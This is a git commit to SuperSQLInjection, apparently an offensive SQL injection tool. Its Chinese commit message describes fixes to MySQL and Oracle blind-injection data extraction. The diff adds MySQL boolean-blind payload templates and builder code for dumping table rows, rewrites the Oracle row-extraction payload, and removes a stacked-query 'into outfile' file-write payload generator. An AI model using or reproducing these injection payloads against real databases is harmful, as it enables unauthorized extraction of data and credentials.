update20181212

20181212 V1.0 正式版--- 修复MySQL盲注时，在某些情况下，获取的每列数据可能不对应的问题。修复Oracle盲注获取数据的语句。修复盲注时，提示需要配置Union注入问题。优化配置文件，降低数据库类型漏报，增加oracle获取SYS_HASH的语句
2018-12-12 17:29:32 +08:00
parent 0a9fb19ba9
commit 34e522e4ea
5 changed files with 31 additions and 39 deletions
--- a/SuperSQLInjection/payload/MySQL.cs
+++ b/SuperSQLInjection/payload/MySQL.cs
@@ -65,7 +65,8 @@ namespace SuperSQLInjection.payload
        //获取行数据bool
        public static String data_value = "(select {columns} from {dbname}.{table} limit {limit},1)";

-       
+        //获取数据bool,加入orderby解决获取数据时，获取到的数据每一行可能不对称的可能
+        public static String data_value_orderBy = "(select {columns} from {dbname}.{table} order by {orderby} limit {limit},1)";

        //union获取数据条数
        public static String data_count = "(select count(*) from {dbname}.{table})";
@@ -180,11 +181,6 @@ namespace SuperSQLInjection.payload
            return sb.ToString();
        }

-        public static String creatMySQLWriteFileByUnionByMuSQL(String path, String content)
-        {
-            return ";select " + Tools.strToHex(content,"UTF-8") + " into outfile '" + path + "'";
-        }
-
        public static String creatMySQLColumnsStrByError(List<String> columns, String table, String dbName, int limit)
        {
            StringBuilder sb = new StringBuilder();
@@ -361,6 +357,11 @@ namespace SuperSQLInjection.payload

        }

+        public static String getBoolDataPayLoad(String column, String orderBy, String dbName, String table, int index)
+        {
+            String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{limit}", index + "");
+            return data;
+        }



--- a/SuperSQLInjection/payload/Oracle.cs
+++ b/SuperSQLInjection/payload/Oracle.cs
@@ -53,7 +53,7 @@ namespace SuperSQLInjection.payload
        public static String bool_value = " ascii(substr({data},{index},1))>{len}";

        //获取行数据
-        public static String data_value = "(select {data} from (select {allcolumns},rownum as limit from (select * from {dbname}.{table}))  where limit={index})";
+        public static String data_value = "(select {data} from (select {allcolumns},rownum as limit from {dbname}.{table})  where limit={index})";


        //union获取数据条数
@@ -153,18 +153,12 @@ namespace SuperSQLInjection.payload
        /// <param name="table">表名</param>
        /// <param name="index">下标</param>
        /// <returns></returns>
-        public static String getBoolDataPayLoad(String column,String orderby,String dbName, String table, int index)
+        public static String getBoolDataPayLoad(String column, String dbName, String table, int index)
        {
-            String data = setDataValue(column, orderby);
-            String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
+            String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
            return payload;
        }

-        private static String setDataValue(String allColumns, String orderby)
-        {
-            return data_value.Replace("{allcolumns}", allColumns);
-        }
-
        public static String getDataValue(List<String> columns, String dbName, String table, String index)
        {
            StringBuilder sb = new StringBuilder();